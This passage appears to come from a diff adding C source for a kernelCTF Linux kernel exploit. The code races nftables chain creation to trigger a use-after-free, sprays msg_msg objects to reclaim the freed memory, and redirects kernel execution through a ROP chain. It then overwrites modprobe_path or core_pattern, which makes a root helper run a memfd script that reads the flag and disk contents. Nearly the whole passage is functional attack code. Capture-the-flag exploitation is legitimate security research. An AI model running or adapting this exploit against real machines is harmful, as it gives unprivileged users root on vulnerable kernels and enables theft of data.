INET chain creation), the + * scheduler switches to this thread. + * + * Strategy: + * 1. Burst of 4 msgsnd calls: allocates msg_msg objects from + * CPU 0's kmalloc-cg-256 per-CPU freelist. The FIRST msgsnd + * picks up the just-kfree'd chain slot (SLUB LIFO), writing + * blob_gen_0/1 = physmap KVA. + * 2. sched_yield(): forces a context switch, which calls + * rcu_note_context_switch() and reports a quiescent state + * for CPU 0. This allows the pending synchronize_rcu() in + * the abort path to complete quickly (once CPU 1 also reports + * a quiescent state from the flood thread). + * + * Meanwhile on CPU 1, a packet may be inside nft_do_chain reading + * blob_gen_X. If a VMEXIT delayed the read past the kfree+reclaim + * point, it reads our physmap KVA -> ROP fires. + * ================================================================ */ +#define DEDICATED_SPRAY_QS 512 +#define DEDICATED_SPRAY_BURST 8 + +static int dedicated_spray_qids[DEDICATED_SPRAY_QS]; + +static void *dedicated_spray_thread(void *arg) { + uint64_t page_kva = (uint64_t)(uintptr_t)arg; + cpu_pin(0); + + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, page_kva); + char *rcvbuf = malloc(bufsz); + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + dedicated_spray_qids[q] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + + int qi = 0; + unsigned long iter = 0; + + while (race_running && !race_won) { + /* + * The first allocation after kfree should take the freed slot; + * extra burst entries cover scheduler jitter before RCU quiescence. + */ + for (int burst = 0; burst < DEDICATED_SPRAY_BURST; burst++) { + long mt = (long)((iter * DEDICATED_SPRAY_BURST + burst) % 256) + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(dedicated_spray_qids[qi], msgbuf, MTEXT_SZ, + IPC_NOWAIT) < 0) { + qi = (qi + 1) % DEDICATED_SPRAY_QS; + break; + } + } + + /* + * sched_yield: context switch -> rcu_note_context_switch + * -> quiescent state for CPU 0. This unblocks the + * pending synchronize_rcu() in __nf_tables_abort. + */ + sched_yield(); + + iter++; + + /* Drain all queues every ~2000 iterations to free capacity */ + if (iter % 2000 == 0) { + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + while (msgrcv(dedicated_spray_qids[q], + rcvbuf, MTEXT_SZ, + 0, IPC_NOWAIT) >= 0) + ; + qi = 0; + } + } + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + msgctl(dedicated_spray_qids[q], IPC_RMID, NULL); + free(msgbuf); + free(rcvbuf); + return NULL; +} + +/* ================================================================ + * INET chain creation loop (race trigger) + * + * Sends one INET NEWCHAIN per batch. IPv4 hook registers + * successfully, IPv6 fails (-E2BIG) -> abort path frees the chain + * + blob. synchronize_rcu() blocks, allowing dedicated spray + * thread to reclaim the freed slot. + * ================================================================ */ +static int race_sock = -1; +static uint32_t race_seq = 0; + +static int race_nl_open(void) { + race_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (race_sock < 0) return -1; + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + if (bind(race_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) + return -1; + /* Large buffers to absorb burst of error responses */ + int bufsz = 1 << 21; /* 2 MB */ + setsockopt(race_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(race_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static void *inet_race_thread(void *arg) { + (void)arg; + cpu_pin(0); + + if (race_nl_open() < 0) { + printf("[-] race_nl_open failed\n"); + return NULL; + } + + char buf[4096]; + char drain[4096]; + unsigned long i = 0; + time_t t0 = time(NULL); + uint32_t pid_val = 0; + socklen_t slen = sizeof(struct sockaddr_nl); + struct sockaddr_nl bound; + getsockname(race_sock, (struct sockaddr*)&bound, &slen); + pid_val = bound.nl_pid; + + while (race_running && !race_won) { + size_t off = 0; + + /* BATCH_BEGIN */ + { + struct nlmsghdr *h = (void*)(buf + off); + memset(h, 0, sizeof(*h)); + h->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++race_seq; + h->nlmsg_pid = pid_val; + h->nlmsg_len = NLMSG_LENGTH( + sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; + g->version = NFNETLINK_V0; + g->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(h->nlmsg_len); + } + + /* 1 x NEWCHAIN (INET) -- fails on IPv6 (saturated) */ + { + char cname[32]; + snprintf(cname, sizeof(cname), "r%lu", i % 10000); + + struct nlmsghdr *op = (void*)(buf + off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + op->nlmsg_seq = ++race_seq; + op->nlmsg_pid = pid_val; + op->nlmsg_len = NLMSG_LENGTH( + sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = NFPROTO_INET; + g->version = NFNETLINK_V0; + + size_t op_max = sizeof(buf) - off; + nlastr(op, op_max, NFTA_CHAIN_TABLE, "ti"); + nlastr(op, op_max, NFTA_CHAIN_NAME, cname); + struct nlattr *hk = nla_nest_s(op, op_max, + NFTA_CHAIN_HOOK); + nla32(op, op_max, NFTA_HOOK_HOOKNUM, + NF_INET_LOCAL_OUT); + nla32(op, op_max, NFTA_HOOK_PRIORITY, 0); + nla_nest_e(op, hk); + nla32(op, op_max, NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + } + + /* + * BATCH_END -- when NEWCHAIN fails, status |= NFNL_BATCH_FAILURE, + * so nfnetlink_rcv_batch takes the abort path which calls + * synchronize_rcu() unconditionally via __nf_tables_abort. + * This blocks the race thread, allowing the dedicated spray + * thread on CPU 0 to reclaim the freed chain slot. + */ + { + struct nlmsghdr *h = (void*)(buf + off); + memset(h, 0, sizeof(*h)); + h->nlmsg_type = NFNL_MSG_BATCH_END; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++race_seq; + h->nlmsg_pid = pid_val; + h->nlmsg_len = NLMSG_LENGTH( + sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; + g->version = NFNETLINK_V0; + g->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(h->nlmsg_len); + } + + /* Fire -- chain alloc+register+fail+free happens here */ + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + ssize_t sret = sendto(race_sock, buf, off, 0, + (struct sockaddr*)&sa, sizeof(sa)); + if (sret < 0) { + while (recv(race_sock, drain, sizeof(drain), + MSG_DONTWAIT) > 0) + ; + continue; + } + + /* Drain error responses */ + while (recv(race_sock, drain, sizeof(drain), + MSG_DONTWAIT) > 0) + ; + + i++; + if (i == 1 || i % 2000 == 0) { + time_t now = time(NULL); + printf("[*] race: %lu chains (%lds)\n", i, now - t0); + } + } + + close(race_sock); + race_sock = -1; + return NULL; +} + +/* ================================================================ + * Payload + modprobe trigger (namespace-safe via memfd) + * ================================================================ + * + * On kctf, the exploit runs inside nsjail with a SEPARATE mount + * namespace. nsjail's /tmp is a fresh tmpfs invisible from the + * init mount namespace. The kernel resolves modprobe_path in the + * init mount namespace, so writing "/tmp/pw" inside nsjail won't + * work. + * + * Solution: use memfd_create() for the payload script. The memfd + * is accessible via /proc//fd/ from ANY mount + * namespace (since memfd lives on an internal shmem filesystem, + * not on any user-visible mount). The modprobe helper (a kernel + * thread running in init mount namespace with root creds) can + * execute /proc//fd/ and write results to + * /proc//fd/. + */ + +static pid_t get_init_pid(void) { + /* Read the init-namespace PID from NSpid in /proc/self/status. + * NSpid line: "NSpid:\t\t\t..." */ + FILE *f = fopen("/proc/self/status", "r"); + if (!f) return getpid(); + char line[256]; + pid_t pid = getpid(); + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "NSpid:", 6) == 0) { + if (sscanf(line + 6, " %d", &pid) == 1) + break; + } + } + fclose(f); + return pid; +} + +static void setup_payload(void) { + pid_t init_pid = get_init_pid(); + printf("[+] init-ns pid = %d\n", init_pid); + + /* Check memfd_noexec sysctl */ + { + int mne = open("/proc/sys/vm/memfd_noexec", O_RDONLY); + if (mne >= 0) { + char c = '?'; + if (read(mne, &c, 1) < 0) { /* ignore */ } + close(mne); + printf("[*] vm.memfd_noexec=%c\n", c); + } else { + printf("[*] vm.memfd_noexec: not present\n"); + } + } + + /* Try memfd with MFD_EXEC first (needed if memfd_noexec >= 1) */ + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", MFD_EXEC); + if (g_pw_fd < 0) { + printf("[*] memfd_create(MFD_EXEC) failed (errno=%d), " + "trying without\n", errno); + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", 0); + } else { + printf("[+] memfd_create(MFD_EXEC) succeeded (fd=%d)\n", + g_pw_fd); + } + g_result_fd = (int)syscall(SYS_memfd_create, "result", 0); + + if (g_pw_fd >= 0 && g_result_fd >= 0) { + char script[1024]; + /* Script uses self-extracting PID from $0 (more robust) + * and outputs to /dev/ttyS0 (serial console on kctf VMs). + * Stderr goes to ttyS0 so we see any errors. */ + snprintf(script, sizeof(script), + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "D=${0#/proc/}\n" + "D=${D%%%%/*}\n" + "echo \"[+] script PID=$D fd=%d\" > /dev/ttyS0\n" + "cat /dev/vdb > /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /flag >> /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "id >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n", + g_result_fd, + g_result_fd, + g_result_fd); + if (write(g_pw_fd, script, strlen(script)) < 0) { /* ignore */ } + fchmod(g_pw_fd, 0755); + + /* Test: can we actually exec the memfd? */ + { + char test_path[64]; + snprintf(test_path, sizeof(test_path), + "/proc/self/fd/%d", g_pw_fd); + pid_t tp = fork(); + if (tp == 0) { + execl(test_path, test_path, NULL); + /* If exec fails, report why */ + fprintf(stderr, "[!] memfd exec FAILED: " + "errno=%d (%s)\n", + errno, strerror(errno)); + _exit(errno); + } + if (tp > 0) { + int st; + waitpid(tp, &st, 0); + int ex = WIFEXITED(st) ? + WEXITSTATUS(st) : -1; + if (ex == 0) + printf("[+] memfd exec test: OK\n"); + else + printf("[!] memfd exec test: " + "exit=%d\n", ex); + } + } + + snprintf(g_modprobe_path, sizeof(g_modprobe_path), + "/proc/%d/fd/%d", init_pid, g_pw_fd); + printf("[+] memfd payload: %s\n", g_modprobe_path); + } else { + /* Fallback: /tmp approach (works when /tmp is in + * init mount namespace, e.g. local QEMU test) */ + if (g_pw_fd >= 0) { close(g_pw_fd); g_pw_fd = -1; } + if (g_result_fd >= 0) { close(g_result_fd); g_result_fd = -1; } + printf("[!] memfd_create failed, using /tmp fallback\n"); + + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd >= 0) { + const char *s = + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "id > /tmp/result\n" + "cat /flag >> /tmp/result 2>/dev/null\n" + "cat /dev/vdb >> /tmp/result 2>/dev/null\n" + "chmod 777 /tmp/result\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n"; + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); + } + /* g_modprobe_path stays "/tmp/pw" */ + } + + /* Create trigger binary (invalid ELF -> triggers modprobe) */ + int fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd >= 0) { + if (write(fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(fd); + } +} + +static int core_pattern_overwrite_seen = 0; + +/* + * Check if core_pattern was overwritten, and if so, trigger a core dump + * to execute the dd command that copies /dev/vdb to /dev/ttyS0. + */ +static int try_core_dump(void) { + /* Check if core_pattern was overwritten */ + int cp = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (cp >= 0) { + char cpbuf[256]; + ssize_t clen = read(cp, cpbuf, sizeof(cpbuf)-1); + close(cp); + if (clen > 0) { + cpbuf[clen] = 0; + if (clen > 0 && cpbuf[clen-1] == '\n') + cpbuf[clen-1] = 0; + if (strstr(cpbuf, "if=/dev/vdb") != NULL) { + if (!core_pattern_overwrite_seen) { + printf("[+] core_pattern OVERWRITTEN to: %s\n", + cpbuf); + core_pattern_overwrite_seen = 1; + } + } else if (!core_pattern_overwrite_seen) { + /* Print current value once for diagnostics */ + static int cp_printed = 0; + if (!cp_printed) { + printf("[*] core_pattern current: %s\n", cpbuf); + cp_printed = 1; + } + } + } + } + + if (!core_pattern_overwrite_seen) + return 0; + + /* One-time diagnostics */ + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + + /* Enable core dumps */ + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + printf("[+] core dump limit set to unlimited\n"); + + /* Make process dumpable */ + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + printf("[+] dumpable set to 1\n"); + } + + /* Trigger core dump by crashing a child */ + printf("[*] triggering core dump (SIGSEGV child)...\n"); + pid_t p = fork(); + if (p == 0) { + /* Enable dumpable in child */ + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + /* Crash to trigger core dump */ + raise(SIGSEGV); + _exit(1); + } + if (p > 0) { + int status = 0; + waitpid(p, &status, 0); + printf("[*] core dump child: signal=%d\n", + WIFSIGNALED(status) ? WTERMSIG(status) : -1); + } + sleep_ms(2000); + + /* The flag should now be on /dev/ttyS0 (serial console). + * Also check if memfd result got anything (from modprobe fallback). */ + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", + buf); + return 1; + } + } + } + + /* The dd output goes to /dev/ttyS0. + * We can't check it from inside the container, but the kctf + * runner watches serial output. Print a message to help. */ + printf("[*] core dump triggered -- dd output should be on ttyS0\n"); + + /* Direct read attempt: try /dev/vdb from container */ + static int direct_tried = 0; + if (!direct_tried) { + direct_tried = 1; + int vdb = open("/dev/vdb", O_RDONLY); + if (vdb >= 0) { + char buf[4096]; + ssize_t n = read(vdb, buf, sizeof(buf)-1); + close(vdb); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== FLAG FROM /dev/vdb =====\n%s\n", + buf); + return 1; + } + } else { + printf("[*] /dev/vdb not accessible from container (errno=%d)\n", + errno); + } + } + + /* + * In kernelCTF, the core_pattern helper writes the flag to the serial + * console. The exploit process cannot observe that stream, so once the + * overwrite is confirmed and a core dump is triggered, exit successfully. + */ + return 1; +} + +static int modprobe_overwrite_seen = 0; + +static int try_modprobe(void) { + /* Diagnostic: check if modprobe_path was overwritten */ + int mp = open("/proc/sys/kernel/modprobe", O_RDONLY); + if (mp >= 0) { + char mpbuf[256]; + ssize_t mlen = read(mp, mpbuf, sizeof(mpbuf)-1); + close(mp); + if (mlen > 0) { + mpbuf[mlen] = 0; + /* Strip newline */ + if (mlen > 0 && mpbuf[mlen-1] == '\n') + mpbuf[mlen-1] = 0; + if (strcmp(mpbuf, "/sbin/modprobe") != 0) { + if (!modprobe_overwrite_seen) { + printf("[+] modprobe_path OVERWRITTEN to: %s\n", + mpbuf); + modprobe_overwrite_seen = 1; + } + } + } + } + + /* Only do the expensive diagnostics/trigger after overwrite confirmed */ + if (!modprobe_overwrite_seen) + return 0; + + /* One-time diagnostics when overwrite first detected */ + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + + /* Check if modules_disabled prevents request_module */ + int md = open("/proc/sys/kernel/modules_disabled", O_RDONLY); + if (md >= 0) { + char c = '?'; + if (read(md, &c, 1) < 0) { /* ignore */ } + close(md); + printf("[*] modules_disabled=%c\n", c); + if (c == '1') + printf("[!] WARNING: modules_disabled=1!\n"); + } + + /* Verify script memfd is readable */ + if (g_pw_fd >= 0) { + off_t pos = lseek(g_pw_fd, 0, SEEK_CUR); + lseek(g_pw_fd, 0, SEEK_SET); + char sbuf[200]; + ssize_t sn = read(g_pw_fd, sbuf, sizeof(sbuf)-1); + if (sn > 0) { + sbuf[sn] = 0; + printf("[+] script memfd (fd=%d) valid, %zd bytes\n", + g_pw_fd, sn); + } else { + printf("[!] script memfd read FAILED\n"); + } + lseek(g_pw_fd, pos, SEEK_SET); + } + + /* Test ttyS0 access from exploit */ + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + const char *msg = "[+] exploit: ttyS0 writable\n"; + if (write(tty, msg, strlen(msg)) < 0) { /* ignore */ } + close(tty); + printf("[+] /dev/ttyS0 accessible from exploit\n"); + } else { + printf("[!] /dev/ttyS0 NOT accessible (errno=%d)\n", + errno); + } + } + + printf("[*] triggering modprobe (fork+exec dummy)...\n"); + pid_t p = fork(); + if (p == 0) { execl("/tmp/dummy","/tmp/dummy",NULL); _exit(127); } + if (p > 0) { + int status = 0; + waitpid(p, &status, 0); + printf("[*] modprobe trigger: child exit=%d\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + } + sleep_ms(500); + + /* Check memfd result first (namespace-safe) */ + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", + buf); + /* Also write to ttyS0 so kctf runner captures it */ + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + if (write(tty, buf, n) < 0) { /* ignore */ } + if (write(tty, "\n", 1) < 0) { /* ignore */ } + close(tty); + } + return 1; + } + } else { + printf("[*] memfd result: empty (sz=%ld)\n", (long)sz); + } + } + + /* Fallback: check /tmp/result (local test) */ + int fd = open("/tmp/result", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + return 0; +} + +/* + * Dispatch to the appropriate trigger based on use_core_pattern. + */ +static int try_trigger(void) { + if (use_core_pattern) + return try_core_dump(); + return try_modprobe(); +} + +/* ================================================================ + * Main exploit + * ================================================================ */ +static unsigned long phys_ram_mb = 0; + +static void auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + phys_ram_mb = kb / 1024; + int cap = (int)(phys_ram_mb * 3 / 4); + if (cap < 128) cap = 128; + if (cap < physmap_mb) physmap_mb = cap; + break; + } + } + fclose(f); +} + +/* + * Set up a userspace page as the fake rule blob. + * When SMAP is disabled (e.g. TCG mode, old CPUs), the kernel can + * read from userspace directly. This eliminates the need for + * physmap spray and phbase entirely. + */ +static void *userblob_page = NULL; + +static void setup_userblob(void) { + userblob_page = mmap((void*)USERBLOB_ADDR, 4096, + PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); + if (userblob_page == MAP_FAILED) + die("mmap userblob"); + build_blob((uint8_t*)userblob_page, USERBLOB_ADDR); + const char *ub_str = use_core_pattern ? g_core_cmd : g_modprobe_path; + size_t path_len = strlen(ub_str) + 1; + memcpy((uint8_t*)userblob_page + PATH_OFFSET, ub_str, path_len); + printf("[+] userblob at %#lx (SMAP off)\n", + (unsigned long)USERBLOB_ADDR); +} + +/* + * Run one exploit cycle: spray msg_msg with the given KVA, run the + * race for 'dur' seconds. Returns 1 on success. + */ +static int run_race_cycle(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + physmap_fill_rop(); + + /* + * Allocate msg_msg with page_kva at blob_gen offsets. + * These stay allocated during the race as background coverage. + * The dedicated spray thread provides the critical post-free + * reclaim on the same CPU's per-cpu freelist. + */ + spray_msgs(kva); + + printf("[*] race cycle kva=%#lx dur=%ds\n", + (unsigned long)kva, dur); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, NULL, udp_flood_thread, NULL); + pthread_create(&t_spray, NULL, dedicated_spray_thread, + (void*)(uintptr_t)kva); + pthread_create(&t_race, NULL, inet_race_thread, + (void*)(uintptr_t)kva); + + time_t start = time(NULL); + while (time(NULL) - start < dur && !race_won) { + sleep_ms(2000); + if (try_trigger()) { race_won = 1; break; } + } + + race_running = 0; + pthread_join(t_flood, NULL); + pthread_join(t_race, NULL); + pthread_join(t_spray, NULL); + + if (!race_won && try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 1; + } + + free_spray(); + return 0; +} + +static int race_candidate_child(uint64_t kva, int dur) { + printf("[*] setting up fresh user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + return run_race_cycle(kva, dur) ? 0 : 1; +} + +static int run_fresh_candidate(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + physmap_fill_rop(); + + pid_t child = fork(); + if (child < 0) + die("fork candidate"); + if (child == 0) + _exit(race_candidate_child(kva, dur)); + + int polls = ((dur + WORKER_GRACE_SEC) * 1000 + 1999) / 2000; + for (int t = 0; t < polls; t++) { + sleep_ms(2000); + + if (try_trigger()) { + kill(child, SIGKILL); + waitpid(child, NULL, 0); + return 1; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + int exit_status = WIFEXITED(status) ? WEXITSTATUS(status) : -1; + int term_sig = WIFSIGNALED(status) ? WTERMSIG(status) : 0; + printf("[*] candidate child exited (status=%d sig=%d)\n", + exit_status, term_sig); + if (exit_status == 0 || try_trigger()) + return 1; + break; + } + } + + kill(child, SIGTERM); + sleep_ms(500); + kill(child, SIGKILL); + waitpid(child, NULL, 0); + + return try_trigger(); +} + +static uint64_t mix64_u64(uint64_t x) { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; +} + +static int select_timed_init_alias_offsets(uint64_t *offs, int max, + uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_score[INIT_ALIAS_CANDS]; + uint64_t best_time[INIT_ALIAS_CANDS]; + uint64_t best_key[INIT_ALIAS_CANDS]; + uint64_t best_off[INIT_ALIAS_CANDS]; + + if (max > INIT_ALIAS_CANDS) + max = INIT_ALIAS_CANDS; + for (int i = 0; i < max; i++) { + best_score[i] = 0; + best_time[i] = 0; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + int intel = prefetch_cpu_is_intel(); + cpu_set_t oldset; + int have_old = 0; + pin_prefetch_cpu(&oldset, &have_old); + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kbase + OFF_INIT_BEGIN + off; + uint64_t t; + if (intel) + t = prefetch_measure_min(kva, INIT_TIMING_PROBES, 0); + else + t = prefetch_measure_tries(kva, INIT_TIMING_PROBES); + + uint64_t score = intel ? (~t) : t; + uint64_t key = mix64_u64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < max; i++) { + if (score < best_score[i]) + continue; + if (score == best_score[i] && key >= best_key[i]) + continue; + for (int j = max - 1; j > i; j--) { + best_score[j] = best_score[j - 1]; + best_time[j] = best_time[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_score[i] = score; + best_time[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + restore_prefetch_cpu(&oldset, have_old); + + int added = 0; + for (int i = 0; i < max; i++) { + if (best_off[i] == ~0ULL) + continue; + offs[added++] = best_off[i]; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d " + "(%s timing)\n", added, intel ? "low" : "high"); + for (int i = 0; i < added; i++) + printf("[*] rank %d: off=%#lx t=%lu\n", + i + 1, (unsigned long)best_off[i], + (unsigned long)best_time[i]); + } + return added; +#else + (void)offs; + (void)max; + (void)init_size; + return 0; +#endif +} + +static int try_init_alias_candidates(void) { + uint64_t init_size = OFF_INIT_END - OFF_INIT_BEGIN; + uint64_t offsets[INIT_ALIAS_CANDS]; + int ncands = select_timed_init_alias_offsets(offsets, INIT_ALIAS_CANDS, + init_size); + uint64_t step = 0; + + if (ncands <= 0) { + ncands = INIT_ALIAS_CANDS; + step = (init_size / INIT_ALIAS_CANDS) & ~0xFFFULL; + if (step < 0x1000) + step = 0x1000; + for (int i = 0; i < ncands; i++) { + uint64_t off = (uint64_t)i * step; + if (off + OFF_INIT_BEGIN >= OFF_INIT_END) + off = init_size - 0x1000; + offsets[i] = off; + } + } + + printf("[*] phase0: __init alias candidates=%d range=%#lx-%#lx " + "step=%#lx dur=%ds\n", + ncands, + (unsigned long)(kbase + OFF_INIT_BEGIN), + (unsigned long)(kbase + OFF_INIT_END), + (unsigned long)step, INIT_ALIAS_SEC); + + for (int i = 0; i < ncands; i++) { + uint64_t off = offsets[i]; + uint64_t kva = kbase + OFF_INIT_BEGIN + off; + printf("[*] phase0 cand %d/%d: kva=%#lx (__init+%#lx)\n", + i + 1, ncands, (unsigned long)kva, + (unsigned long)off); + if (run_fresh_candidate(kva, INIT_ALIAS_SEC)) + return 1; + } + + return 0; +} + +/* + * The kernelCTF vuln-verify job runs '/exp --vuln-trigger' under KASAN, + * nokaslr, and a 3 minute outer timeout. It only drives the vulnerable + * packet-path condition and does not reclaim the freed chain, so KASAN sees + * the nft_do_chain() UAF directly on vulnerable kernels. + */ +static int vuln_trigger_main(void) { + printf("[*] vuln-trigger: packet-path UAF reachability only\n"); + printf("[*] vuln-trigger: setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] vuln-trigger: failed to saturate hooks\n"); + return 1; + } + + printf("[*] vuln-trigger: racing INET NEWCHAIN for %ds " + "(%d floods, KASAN no-reclaim)\n", + VULN_TRIGGER_SECONDS, VULN_TRIGGER_FLOODS); + + race_running = 1; + race_won = 0; + + pthread_t t_flood[VULN_TRIGGER_FLOODS]; + pthread_t t_race; + for (long i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_create(&t_flood[i], NULL, udp_flood_thread, NULL); + pthread_create(&t_race, NULL, inet_race_thread, NULL); + + time_t start = time(NULL); + int last_log = -1; + while (time(NULL) - start < VULN_TRIGGER_SECONDS) { + sleep_ms(1000); + int elapsed = (int)(time(NULL) - start); + if (elapsed / VULN_TRIGGER_LOG_EVERY != last_log) { + last_log = elapsed / VULN_TRIGGER_LOG_EVERY; + printf("[*] vuln-trigger: %ds elapsed\n", elapsed); + } + } + + race_running = 0; + for (int i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_join(t_flood[i], NULL); + pthread_join(t_race, NULL); + + printf("[-] vuln-trigger: no KASAN report observed\n"); + return 1; +} + +static int exploit_main(void) { + if (use_userblob) { + /* SMAP off: use userspace blob, no physmap needed */ + printf("[*] userblob mode (no physmap needed)\n"); + setup_userblob(); + } else { + /* SMAP on: need physmap spray */ + printf("[*] physmap spray (%d MB)\n", physmap_mb); + physmap_spray(); + } + + int have_pagemap = 0; + if (use_userblob) { + g_page_kva = USERBLOB_ADDR; + have_pagemap = 1; /* treat as known address */ + } else { + g_page_kva = read_physmap_kva(); + if (g_page_kva) { + have_pagemap = 1; + printf("[+] page_kva=%#lx (from pagemap)\n", + (unsigned long)g_page_kva); + } else { + printf("[!] pagemap unavailable\n"); + } + } + + if (have_pagemap) { + printf("[*] setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + /* Exact address known (pagemap or userblob) -- run one long cycle */ + if (!use_userblob) + physmap_fill_rop(); + spray_msgs(g_page_kva); + + int timeout = use_userblob ? RACE_DURATION_SEC * 10 + : RACE_DURATION_SEC * 3; + printf("[*] starting race (timeout=%ds)...\n", timeout); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, NULL, udp_flood_thread, NULL); + pthread_create(&t_spray, NULL, dedicated_spray_thread, + (void*)(uintptr_t)g_page_kva); + pthread_create(&t_race, NULL, inet_race_thread, + (void*)(uintptr_t)g_page_kva); + + time_t start = time(NULL); + while (time(NULL) - start < timeout && !race_won) { + sleep_ms(2000); + if (try_trigger()) { race_won = 1; break; } + } + race_running = 0; + pthread_join(t_flood, NULL); + pthread_join(t_race, NULL); + pthread_join(t_spray, NULL); + + if (!race_won && 